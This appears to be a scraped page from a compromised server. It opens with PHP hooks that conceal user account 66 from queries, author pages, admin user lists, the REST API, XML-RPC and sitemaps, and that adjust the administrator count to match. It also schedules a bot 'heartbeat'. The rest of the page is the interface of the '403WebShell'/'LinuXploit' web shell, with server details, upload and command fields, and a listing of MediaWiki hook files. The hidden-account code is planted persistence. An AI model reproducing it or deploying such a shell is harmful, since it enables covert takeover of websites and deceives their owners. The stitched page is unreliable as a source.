add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/includes/Hook/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 08 2025 16:37:55
www-data / www-data
0755
AlternateEditHook.php
0.628 KB
December 05 2024 15:41:41
www-data / www-data
0644
AlternateEditPreviewHook.php
1.015 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiBeforeMainHook.php
0.535 KB
December 05 2024 15:41:41
www-data / www-data
0644
ArticleMergeCompleteHook.php
0.621 KB
December 05 2024 15:41:41
www-data / www-data
0644
ArticleUpdateBeforeRedirectHook.php
0.811 KB
June 11 2025 23:35:17
www-data / www-data
0644
BadImageHook.php
0.686 KB
December 05 2024 15:41:41
www-data / www-data
0644
BeforeInitializeHook.php
1.004 KB
December 05 2024 15:41:41
www-data / www-data
0644
CategoryViewer__doCategoryQueryHook.php
0.86 KB
December 05 2024 15:41:41
www-data / www-data
0644
CategoryViewer__generateLinkHook.php
1.024 KB
December 05 2024 15:41:41
www-data / www-data
0644
ContentSecurityPolicyDefaultSourceHook.php
0.986 KB
December 05 2024 15:41:41
www-data / www-data
0644
ContentSecurityPolicyDirectivesHook.php
0.911 KB
December 05 2024 15:41:41
www-data / www-data
0644
ContentSecurityPolicyScriptSourceHook.php
0.943 KB
December 05 2024 15:41:41
www-data / www-data
0644
DeleteUnknownPreferencesHook.php
1.247 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditFilterHook.php
1.017 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditFilterMergedContentHook.php
1.658 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditFormInitialTextHook.php
0.559 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditFormPreloadTextHook.php
0.609 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageBeforeConflictDiffHook.php
0.851 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageBeforeEditButtonsHook.php
0.787 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageBeforeEditToolbarHook.php
0.688 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageCopyrightWarningHook.php
0.818 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageGetCheckboxesDefinitionHook.php
0.79 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageGetDiffContentHook.php
0.814 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageGetPreviewContentHook.php
0.814 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageNoSuchSectionHook.php
0.658 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPageTosSummaryHook.php
0.75 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__attemptSaveHook.php
0.682 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__attemptSave_afterHook.php
0.812 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__importFormDataHook.php
0.702 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__showEditForm_fieldsHook.php
0.76 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__showEditForm_initialHook.php
0.724 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__showReadOnlyForm_initialHook.php
0.812 KB
December 05 2024 15:41:41
www-data / www-data
0644
EditPage__showStandardInputs_optionsHook.php
0.844 KB
December 05 2024 15:41:41
www-data / www-data
0644
FileDeleteCompleteHook.php
0.977 KB
June 11 2025 23:35:17
www-data / www-data
0644
FormatAutocommentsHook.php
1.291 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetBlockErrorMessageKeyHook.php
0.661 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetCanonicalURLHook.php
0.738 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetDefaultSortkeyHook.php
0.628 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetDoubleUnderscoreIDsHook.php
0.733 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetFullURLHook.php
0.72 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetIPHook.php
0.5 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetInternalURLHook.php
0.727 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetLocalURLHook.php
1.022 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetLocalURL__ArticleHook.php
0.754 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetLocalURL__InternalHook.php
0.781 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetMagicVariableIDsHook.php
0.659 KB
December 05 2024 15:41:41
www-data / www-data
0644
GetRelativeTimestampHook.php
1.127 KB
December 05 2024 15:41:41
www-data / www-data
0644
GitViewersHook.php
0.596 KB
December 05 2024 15:41:41
www-data / www-data
0644
ImageBeforeProduceHTMLHook.php
1.63 KB
June 11 2025 23:35:17
www-data / www-data
0644
ImgAuthBeforeStreamHook.php
1.146 KB
December 05 2024 15:41:41
www-data / www-data
0644
ImgAuthModifyHeadersHook.php
0.905 KB
December 05 2024 15:41:41
www-data / www-data
0644
ImportHandleUnknownUserHook.php
0.575 KB
December 05 2024 15:41:41
www-data / www-data
0644
InitializeArticleMaybeRedirectHook.php
1.12 KB
June 11 2025 23:35:17
www-data / www-data
0644
IsTrustedProxyHook.php
0.624 KB
December 05 2024 15:41:41
www-data / www-data
0644
LinkerMakeExternalImageHook.php
0.668 KB
December 05 2024 15:41:41
www-data / www-data
0644
LinkerMakeExternalLinkHook.php
0.783 KB
December 05 2024 15:41:41
www-data / www-data
0644
LinkerMakeMediaLinkFileHook.php
0.889 KB
June 11 2025 23:35:17
www-data / www-data
0644
MagicWordwgVariableIDsHook.php
0.569 KB
December 05 2024 15:41:41
www-data / www-data
0644
MaintenanceRefreshLinksInitHook.php
0.59 KB
December 05 2024 15:41:41
www-data / www-data
0644
MaintenanceShellStartHook.php
0.357 KB
December 05 2024 15:41:41
www-data / www-data
0644
MaintenanceUpdateAddParamsHook.php
1.125 KB
December 05 2024 15:41:41
www-data / www-data
0644
MediaWikiPerformActionHook.php
1.196 KB
June 11 2025 23:35:17
www-data / www-data
0644
MediaWikiServicesHook.php
3.012 KB
June 11 2025 23:35:17
www-data / www-data
0644
MimeMagicGuessFromContentHook.php
0.86 KB
December 05 2024 15:41:41
www-data / www-data
0644
MimeMagicImproveFromExtensionHook.php
0.711 KB
December 05 2024 15:41:41
www-data / www-data
0644
MimeMagicInitHook.php
0.923 KB
December 05 2024 15:41:41
www-data / www-data
0644
MovePageCheckPermissionsHook.php
0.885 KB
December 05 2024 15:41:41
www-data / www-data
0644
MovePageIsValidMoveHook.php
0.732 KB
December 05 2024 15:41:41
www-data / www-data
0644
OpenSearchUrlsHook.php
0.644 KB
December 05 2024 15:41:41
www-data / www-data
0644
PageMoveCompleteHook.php
1.051 KB
December 05 2024 15:41:41
www-data / www-data
0644
PageMoveCompletingHook.php
1.056 KB
December 05 2024 15:41:41
www-data / www-data
0644
ParserTestGlobalsHook.php
0.648 KB
December 05 2024 15:41:41
www-data / www-data
0644
PreferencesGetIconHook.php
0.82 KB
December 05 2024 15:41:41
www-data / www-data
0644
PreferencesGetLayoutHook.php
0.977 KB
December 05 2024 15:41:41
www-data / www-data
0644
ProtectionFormAddFormFieldsHook.php
0.528 KB
June 11 2025 23:35:17
www-data / www-data
0644
ProtectionForm__buildFormHook.php
0.767 KB
June 11 2025 23:35:17
www-data / www-data
0644
ProtectionForm__saveHook.php
0.855 KB
June 11 2025 23:35:17
www-data / www-data
0644
ProtectionForm__showLogExtractHook.php
0.728 KB
June 11 2025 23:35:17
www-data / www-data
0644
SelfLinkBeginHook.php
0.854 KB
December 05 2024 15:41:41
www-data / www-data
0644
SetupAfterCacheHook.php
0.47 KB
December 05 2024 15:41:41
www-data / www-data
0644
TempUserCreatedRedirectHook.php
1.31 KB
December 05 2024 15:41:41
www-data / www-data
0644
TestCanonicalRedirectHook.php
0.9 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleExistsHook.php
0.607 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleGetEditNoticesHook.php
0.775 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleGetRestrictionTypesHook.php
0.647 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleIsAlwaysKnownHook.php
0.858 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleIsMovableHook.php
0.885 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleMoveHook.php
0.854 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleMoveStartingHook.php
0.689 KB
December 05 2024 15:41:41
www-data / www-data
0644
TitleSquidURLsHook.php
0.646 KB
December 05 2024 15:41:41
www-data / www-data
0644
UnitTestsAfterDatabaseSetupHook.php
0.758 KB
December 05 2024 15:41:41
www-data / www-data
0644
UnitTestsBeforeDatabaseTeardownHook.php
0.56 KB
December 05 2024 15:41:41
www-data / www-data
0644
UnitTestsListHook.php
0.681 KB
December 05 2024 15:41:41
www-data / www-data
0644
UserToolLinksEditHook.php
0.723 KB
December 05 2024 15:41:41
www-data / www-data
0644
WebRequestPathInfoRouterHook.php
0.587 KB
December 05 2024 15:41:41
www-data / www-data
0644
WebResponseSetCookieHook.php
0.836 KB
December 05 2024 15:41:41
www-data / www-data
0644

Youez - 2016 - github.com/yon3zu
LinuXploit